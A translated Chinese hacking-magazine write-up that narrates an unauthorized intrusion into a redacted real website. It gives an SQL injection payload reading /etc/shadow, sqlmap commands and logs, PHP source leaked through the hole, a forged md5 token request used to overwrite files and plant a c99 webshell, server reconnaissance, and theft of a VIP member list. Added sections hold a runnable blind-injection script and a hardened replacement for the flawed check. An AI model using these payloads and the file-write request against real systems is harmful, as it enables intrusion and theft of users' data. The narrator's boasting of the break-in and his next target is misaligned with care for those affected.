Haha, it really did dump out... Next, of course, comes shadow....

```
faqid=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,load_file(char(47,101,116,99,47,115,104,97,100,111,119)),6,7,8,9/*
```

(The char() sequence spells /etc/shadow.) Blank page back..... Nothing dumped this time. Looks like we're nobody on this box... a bit like how I'm all suave in front of girls but well behaved in front of Zhenzhen :)

So what now? Write a file?! magic_quotes_gpc=on... I had forgotten about that damn gpc.... No file writes, and we're nobody; what else is there? Let's have a tool pull the tables and database info first.

```
knell@Knell-SuckEr:~/sqlmap$ sudo ./sqlmap.py -u "http://www.xxxxx.tv/us/faq.html?faqid=1" -v 1 --string "ball_arrow" --users --passwords
```

(Not many people know this tool... a word on the parameters: -u is the URL, of course; -v is the verbosity level, 1 shows the details; --string is the characteristic string of the "true page"; --users and --passwords pull the user names and password hashes out of mysql.user.)

```
[sudo] password for knell:

sqlmap/0.5 coded by inquis and belch

[*] starting at: 20:42:35

[20:42:39] [INFO] testing if GET parameter 'faqid' is dynamic
[20:42:41] [INFO] confirming that GET parameter 'faqid' is dynamic
[20:42:47] [INFO] GET parameter 'faqid' is dynamic
[20:42:47] [INFO] testing sql injection on GET parameter 'faqid'
[20:42:47] [INFO] testing numeric/unescaped injection on GET parameter 'faqid'
[20:42:54] [INFO] confirming numeric/unescaped injection on GET parameter 'faqid'
[20:42:57] [INFO] GET parameter 'faqid' is numeric/unescaped injectable
[20:42:57] [INFO] testing MySQL
[20:42:57] [INFO] query: CONCAT('2', '2')
[20:42:57] [INFO] retrieved: 22
[20:44:10] [INFO] performed 20 queries in 73 seconds
[20:44:10] [INFO] confirming MySQL
[20:44:10] [INFO] query: LENGTH('2')
[20:44:10] [INFO] retrieved: 1
[20:44:52] [INFO] performed 13 queries in 41 seconds
[20:44:52] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[20:44:52] [INFO] retrieved:
[20:45:10] [INFO] performed 6 queries in 17 seconds

remote DBMS: MySQL
```

```
knell@Knell-SuckEr:~/sqlmap$ sudo ./sqlmap.py -u "http://www.xxxxx.tv/us/faq.html?faqid=1" -v 1 --string "ball_arrow" --tables

sqlmap/0.5 coded by inquis and belch

[*] starting at: 22:36:50

[22:36:53] [INFO] testing if GET parameter 'faqid' is dynamic
[22:36:56] [INFO] confirming that GET parameter 'faqid' is dynamic
[22:37:00] [INFO] GET parameter 'faqid' is dynamic
[22:37:00] [INFO] testing sql injection on GET parameter 'faqid'
[22:37:00] [INFO] testing numeric/unescaped injection on GET parameter 'faqid'
[22:37:05] [INFO] confirming numeric/unescaped injection on GET parameter 'faqid'
[22:37:08] [INFO] GET parameter 'faqid' is numeric/unescaped injectable
[22:37:08] [INFO] testing MySQL
[22:37:08] [INFO] query: CONCAT('2', '2')
[22:37:08] [INFO] retrieved: 22
[22:37:57] [INFO] performed 20 queries in 49 seconds
[22:37:57] [INFO] confirming MySQL
[22:37:57] [INFO] query: LENGTH('2')
[22:37:57] [INFO] retrieved: 1
[22:38:29] [INFO] performed 13 queries in 32 seconds
[22:38:29] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[22:38:29] [INFO] retrieved:
[22:38:44] [INFO] performed 6 queries in 14 seconds

remote DBMS: MySQL
```

(What follows is the site's PHP source as it came back through the injection. The forum's HTML filter swallowed everything between a `<` and the next `>`, so the `<>` comparisons, the heredoc openers and all markup inside the heredocs are gone, and the Japanese comments were displayed as mojibake. The `<>` operators are restored below, the stretches that were lost are marked, and the Japanese is decoded; the dump itself begins mid-file.)

```php
// [dump begins mid-file; the extracted text starts here]
0){define("LANGUAGE", "_k");$strCookie = "kr";}
elseif (strpos($_SERVER["SCRIPT_FILENAME"], "/us")>0){define("LANGUAGE", "_e");$strCookie = "us";}
elseif (strpos($_SERVER["SCRIPT_FILENAME"], "/jj/")>0){// テストディレクトリ (test directory)
define("LANGUAGE", "");$strCookie = "jj";}
elseif (strpos($_SERVER["SCRIPT_FILENAME"], "/jp/")>0){define("LANGUAGE", "");$strCookie = "jp";}
else {define("LANGUAGE", "");$strCookie = "";}
if (!headers_sent()){if ($strCookie <> ""){SetCookie("plib_language", $strCookie, time()+60*60*24*2, "/", $_SERVER["HTTP_HOST"]);}}
$strTitle = "";
// 管理者用ツール (administrator tools)
switch ($_REQUEST["omalist"]){
case "srch3838":ReportSearchKeywords();break;
case "dnmv3838":ReportDownloads();break;
case "dnmv3838sum":ReportDownloadsSum();break;
case "compdir":ReportCompDir();break;
default:}
function connect(){@mysql_connect(DB_SERVER, DB_USER, DB_PWD) or die("database connect error");@mysql_query("use ".DB_NAME);@mysql_query("set wait_timeout=3");@mysql_query("set names utf8");}
function CheckSession(){session_start();if ($_REQUEST[MovieSearchForm]=="GO"){$_SESSION[lw] = $_SESSION[type] = $_SESSION[looks] = $_SESSION[play] = $_SESSION[mosaic] = "";$_SESSION[srchtext] = htmlspecialchars($_REQUEST[srchtext]);for ($intCnt=1; $intCnt
// [... lost in extraction; the text resumes inside the loop of db_exec() ...]
<> ""){// echo "SQL $intCnt $arySQL[$intCnt] ";
$rs = mysql_query($arySQL[$intCnt], $DB);
// if (!$rs) echo "Error1 db_exec:".$arySQL[$intCnt]." ";
}}
if ($rs){return $rs;} else {// echo "Error2 db_exec:".$arySQL[$intCnt-1]." ";
return FALSE;}}
function db_insert_id($DB){return @mysql_insert_id($DB);}
function db_query($DB, $SQL){// @mysql_query("SET NAMES 'utf8'", $DB);
return @mysql_query($SQL, $DB);}
function db_fetch_row($RS, $RowCount=0){$rows = array();if (@mysql_data_seek($RS, $RowCount)){for ($intCnt=0; $intCnt
// [... lost in extraction ...]
<> "" && $_GET["dbedit_tbl"] <> "" && $_GET["dbedit_key"] <> "" && $_GET["dbedit_keyvalue"] <> ""){
$db = mysql_connect("localhost", "root", "");
```

This programmer's habits are really bad... the code is super long again, and although it is only supposed to handle the database connection it carries a pile of other functions... Still, what I wanted is there.... the root password....... is empty....

```php
$db = mysql_connect("localhost", "root", "");
```

Anyone could guess that remote connections aren't allowed... I had planned to connect to the database, dump the data and leave, but now it looks like I'll have to get a shell....

So how to get a shell? Heh, where there's a will there's a way. I started reading his scripts one by one... annoying: the data dumped out of the field has no line breaks, exhausting to read....

Going after the database directly is a long shot now, but looking for file operations, includes or command execution is still doable. So I looked and looked.. first in libs2.php. Wow... what classic code..

```php
function WriteTextFile($FileName, $TextData){$fp = fopen($FileName, "w");fputs($fp, $TextData);fclose($fp);}
```

This function takes filename and textdata straight as its parameters, so find a script that calls it and, with register_globals on, you can basically write a webshell with it directly. Looked and looked... looked and looked.. this was actually the third time looking.. the first two times I searched for ages and found nothing.... many days have passed since the first penetration..
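The sqlmap runs above retrieve every value through yes/no requests only: each `[INFO] query:` line is answered by a string of boolean probes whose outcome is read from whether "ball_arrow" still appears in the response, which is why a two-character answer cost 20 requests and 73 seconds. (The empty result for the information_schema.TABLES probe is consistent with a MySQL server older than 5.0, where information_schema does not exist, and that matters when choosing how to enumerate tables.) The following is an added example, not code from the write-up and not sqlmap's own code, that implements that inference against a simulated vulnerable lookup: an in-memory SQLite table stands in for the site's database, the `faqid` parameter and the marker string are the write-up's, the rows are constructed for the example, and SQLite's unicode()/substr() replace MySQL's ORD()/MID().

```python
"""Boolean-based blind inference of the kind sqlmap 0.5 performs in --string mode.

Added example, not code from the original write-up and not sqlmap's own code.
The vulnerable FAQ lookup is simulated with an in-memory SQLite table so the
script runs offline; the parameter name faqid and the marker "ball_arrow" come
from the write-up, the table contents are constructed here.
"""
import sqlite3
from typing import Tuple

MARKER = "ball_arrow"  # the "true page" fingerprint passed to sqlmap as --string

_conn = sqlite3.connect(":memory:")
_conn.executescript(
    "CREATE TABLE faq (faqid INTEGER, question TEXT);"
    "INSERT INTO faq VALUES (1, 'How do I log in?'), (2, 'Pricing');"
)
_query_count = 0


def vulnerable_page(faqid: str) -> str:
    """Simulated faq.html: the parameter is pasted into the query unescaped,
    the 'numeric/unescaped injectable' case sqlmap reported."""
    global _query_count
    _query_count += 1
    try:
        row = _conn.execute(f"SELECT question FROM faq WHERE faqid={faqid}").fetchone()
    except sqlite3.Error:
        return "<html>error</html>"
    if row is None:
        return "<html>no such entry</html>"  # the "false page": marker absent
    return f"<html><img src='{MARKER}.gif'>{row[0]}</html>"  # the "true page"


def oracle(condition: str) -> bool:
    """One yes/no question: does the page still carry the marker when the
    injected condition is ANDed onto the original WHERE clause?"""
    return MARKER in vulnerable_page(f"1 AND ({condition})")


def _bisect(predicate_fmt: str, lo: int, hi: int) -> int:
    """Smallest v in [lo, hi] for which 'value > v' is false, i.e. the value
    itself, found in about log2(hi - lo) requests instead of one per candidate."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(predicate_fmt.format(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def infer_string(expr: str, max_len: int = 64) -> Tuple[str, int]:
    """Retrieve the result of a scalar SQL expression one character at a time.
    Returns (value, number of requests spent)."""
    global _query_count
    _query_count = 0
    length = _bisect(f"LENGTH(({expr})) > {{}}", 0, max_len)
    # SQLite's unicode()/substr() stand in for MySQL's ORD()/MID(); ASCII range.
    chars = [
        chr(_bisect(f"unicode(substr(({expr}),{pos},1)) > {{}}", 0, 127))
        for pos in range(1, length + 1)
    ]
    return "".join(chars), _query_count


if __name__ == "__main__":
    # Mirrors sqlmap's first fingerprint probe, CONCAT('2', '2'), then pulls a row.
    print(infer_string("SELECT '2' || '2'"))
    print(infer_string("SELECT question FROM faq WHERE faqid=2"))
```

The two-character probe costs 6 requests for the length and 7 per character, 20 in all, which is the same order of effort the log shows; every request here is a full page load, so the seconds-per-value figures in the log are the cost of the technique, not of the tool.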
In the end I never found a file that used that function, but there was something even funnier (same reconstruction as above: `<>` restored, stripped markup marked, the Japanese messages decoded from mojibake):

```php
function _template_textedit(){
global $_SERVER;
$crypt = md5($_REQUEST[file].$_SERVER[REMOTE_ADDR]);
if ($_REQUEST[crypt] <> $crypt) die("_template_textedit password error");
if (preg_match("/debugmsg/i", $_POST[text])) die("_template_textedit debug command error");
@header('Content-Type: text/html; charset=UTF-8');
echo <<<EOF
[page head markup stripped] TextEdit $_REQUEST[file]
function HideFrame(){document.getElementById('iframe').innerHTML = '';}
function ShowFrame_Upload(){document.getElementById('iframe').innerHTML = '[iframe markup stripped]';}
function ShowFrame_List(){document.getElementById('iframe').innerHTML = '[iframe markup stripped]';}
EOF;
$dir = str_replace(basename($_SERVER[PHP_SELF]), "", $_SERVER[PHP_SELF]);
if ($_POST[cmd]=="Update" && $_REQUEST[file] <> ""){
if (@copy("$_REQUEST[file]", "$_REQUEST[file]._backup".date("YmdHis"))){
chmod("$_REQUEST[file]._backup".date("YmdHis"), 0666);
} else {
// decoded message: "... cannot be written. The directory permissions must be set to 777."
echo "./$_REQUEST[file]._backup".date("YmdHis")." に書き込みが出来ません。ディレクトリ属性を 777 に設定する必要があります。</font>";
}
if ($fp = @fopen("$_REQUEST[file]", "w")){fputs($fp, stripslashes($_POST[text]));fclose($fp);}
else {
// decoded message: "... cannot be written. The directory/file permissions must be set to 666."
echo "./$_REQUEST[file] に書き込みが出来ません。ディレクトリ/ファイル属性を 666 に設定する必要があります。</font>";
}
} elseif ($_POST[cmd]=="Preview" && $_REQUEST[file] <> ""){
$fp = fopen("__preview.html", "w");fputs($fp, stripslashes($_POST[text]));fclose($fp);
$file = @file("__preview.html");$text = @implode("", $file);
$template = new TemplateHTML();$template->Template = $text;echo $template->HTML();
}
if ($_REQUEST[file] <> ""){
$file = @file($_REQUEST[file]);$text = @implode("", $file);
if ($_REQUEST[file]=="(new)"){
$action = "$_SERVER[PHP_SELF]?job=$_REQUEST[job]&crypt=$crypt";
$filename = <<<EOF
[form field markup stripped]
EOF;
} else {
$action = "$_SERVER[PHP_SELF]?job=$_REQUEST[job]&file=$_REQUEST[file]&crypt=$crypt";
$fdate = date("Y/m/d H:i:s", filectime($_REQUEST[file]));
$filename = <<<EOF
[form field markup stripped]
EOF;
}
if (file_exists("./upload")){$fileupload = <<<EOF
[upload form markup stripped]
EOF;}
$text = htmlspecialchars($text);
echo <<<EOF
[editor form markup stripped] TextEdit File: $dir$_REQUEST[file] $filename$fileupload -->
EOF;
```

Pretty messy... take it slowly!
```php
global $_SERVER;
$crypt = md5($_REQUEST[file].$_SERVER[REMOTE_ADDR]);
if ($_REQUEST[crypt] <> $crypt) die("_template_textedit password error");
```

REMOTE_ADDR is simply the visitor's public IP, and file comes from the request; so this "crypt" is nothing more than md5 over filename + remote_addr..... I had to laugh when I saw it... this is called crypt.....?

With that check out of the way, read on:

```php
$_SERVER[PHP_SELF]?job=$_REQUEST[job]&file=$_REQUEST[file]&crypt=$crypt
```

The tail is the chosen file plus this flimsy crypt; so what can this job actually do? Trace upwards and you see this passage:

```php
function ShowFrame_List(){document.getElementById('iframe').innerHTML = '[iframe markup stripped]';}
EOF;
$dir = str_replace(basename($_SERVER[PHP_SELF]), "", $_SERVER[PHP_SELF]);
if ($_POST[cmd]=="Update" && $_REQUEST[file] <> ""){
if (@copy("$_REQUEST[file]", "$_REQUEST[file]._backup".date("YmdHis"))){
chmod("$_REQUEST[file]._backup".date("YmdHis"), 0666);
}
```

Already exploitable.... but there's something more direct! Then....

```php
if ($fp = @fopen("$_REQUEST[file]", "w")){fputs($fp, stripslashes($_POST[text]));fclose($fp);}
```

Files can be edited directly.. Let's try it :)

```
MD5(faq.html222.133.xxx.xxx,32) = d29882b0460217719ea83a542bdbf56e
```

Build the request:

```
jp/tbs_XXXXXXXXX.php?job=edit&file=faq.html&crypt=d29882b0460217719ea83a542bdbf56e
```

Haha, very sweet... a webshell can be written straight up. So I put a c99 webshell up there.

Connected to the shell, which coldly informed me: id is uid=99(nobody) gid=99(nobody) groups=99(nobody). PHP is 5.05, allow_url_fopen on, register_globals Off, magic_quotes_gpc On.

tcp ports:

```
tcp 0 0 0.0.0.0:32768 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3306  0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:110   0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111   0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80    0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21    0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25    0.0.0.0:* LISTEN
tcp 0 0 :::22         :::*      LISTEN
```

Server configuration:

```
cat /proc/cpuinfo
processor  : 0
vendor_id  : GenuineIntel
cpu family : 15
model      : 2
model name : Intel(R) Xeon(TM) CPU 2.80GHz
```

4 cores in total.

```
cat /proc/meminfo
MemTotal: 2075908 kB
```

And the kernel version is a freakish 2.6.5.....

```
Linux version 2.6.5-1.358smp (bhcompile@bugs.build.redhat.com) (gcc version 3.3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Sat May 8 09:25:36 EDT 2004
```

A local root exploit for 2.6.12-2.6.24 came out a while back, but unfortunately it's no use here.... and anyway I'm not here for root...

Finally I can connect to SQL without a worry, la la la... Heh, the VIP list laid bare~~~~ dump it and leave :)

Penetration over :) Nothing technically impressive, just an example for the many friends who depend on Windows :) Don't bother asking me for VIP accounts.... but.. I've set my sights on a famous Japanese site of the same kind.... penetration in progress....
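As an added illustration of the two faults in `_template_textedit` above (not code from the write-up or from the audited site): the `crypt` token is md5 over two values the requester already knows, so it can be forged for any file and any client address, and `$_REQUEST[file]` goes unfiltered into `fopen(..., "w")`. The script below reproduces the forged check in Python and puts a hardened variant beside it: an HMAC keyed with a server-side secret, bound to the session, compared in constant time, plus a path check that confines writes to a template directory and to non-executable extensions. The client address 203.0.113.7, the session id, the secret and the directory `/var/www/site/templates` are assumptions made up for the example; the address in the write-up is redacted, so its hash cannot be reproduced here.

```python
"""The _template_textedit "crypt" check, forged, beside a hardened replacement.

Added example; not code from the write-up or from the audited site. The weak
scheme reproduces what the quoted PHP does: md5(file . REMOTE_ADDR) compared
against the crypt request parameter. The client address, session id, secret
and template directory below are constructed for this example.
"""
import hashlib
import hmac
from pathlib import Path
from typing import Optional

# ---- what the site shipped: both md5 inputs are known to the requester ---------

def weak_crypt(file: str, remote_addr: str) -> str:
    """PHP: $crypt = md5($_REQUEST[file].$_SERVER[REMOTE_ADDR]);"""
    return hashlib.md5((file + remote_addr).encode()).hexdigest()


def weak_check(file: str, remote_addr: str, supplied: str) -> bool:
    """PHP: if ($_REQUEST[crypt] <> $crypt) die(...);  -- passes when equal."""
    return supplied == weak_crypt(file, remote_addr)


def forge(file: str, attacker_ip: str) -> str:
    """The attacker's side: no secret is involved, so the 'password' is just md5
    of two values the attacker already knows (the file name and its own address)."""
    return weak_crypt(file, attacker_ip)


# ---- a hardened replacement ------------------------------------------------------

TEMPLATE_ROOT = Path("/var/www/site/templates")  # assumed location, not from the write-up


def hardened_token(secret: bytes, session_id: str, file: str) -> str:
    """HMAC over the authenticated session and the file name, keyed with a
    server-side secret the requester never sees. The NUL separator keeps
    ('a', 'b.html') and ('ab', '.html') from producing the same message."""
    return hmac.new(secret, f"{session_id}\0{file}".encode(), hashlib.sha256).hexdigest()


def hardened_check(secret: bytes, session_id: str, file: str, supplied: str) -> bool:
    """Constant-time comparison; a plain == leaks the matching prefix through timing."""
    expected = hardened_token(secret, session_id, file)
    return hmac.compare_digest(expected.encode(), supplied.encode())


def safe_target(file: str, root: Path = TEMPLATE_ROOT) -> Optional[Path]:
    """The quoted code passes $_REQUEST[file] straight to fopen(..., "w").
    Confine writes to the template directory and to non-executable extensions
    before any file is opened; return None for anything else."""
    root = root.resolve()
    candidate = (root / file).resolve()  # an absolute 'file' replaces root; ../ climbs out
    try:
        candidate.relative_to(root)
    except ValueError:
        return None
    if candidate == root or candidate.suffix.lower() not in {".html", ".txt"}:
        return None  # no shell.php next to the templates
    return candidate


if __name__ == "__main__":
    token = forge("faq.html", "203.0.113.7")
    print("forged crypt accepted:", weak_check("faq.html", "203.0.113.7", token))
    print("traversal rejected:", safe_target("../../shell.php") is None)
```

The `preg_match("/debugmsg/i", $_POST[text])` denylist in the original guards one string in the content, not the write itself; the path check above sits at the layer that matters, the file system call, and holds whatever the content is.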
Copyright 2007 黑客防线 (Hackers' Defense). Registration 廊(公)备13100138000530号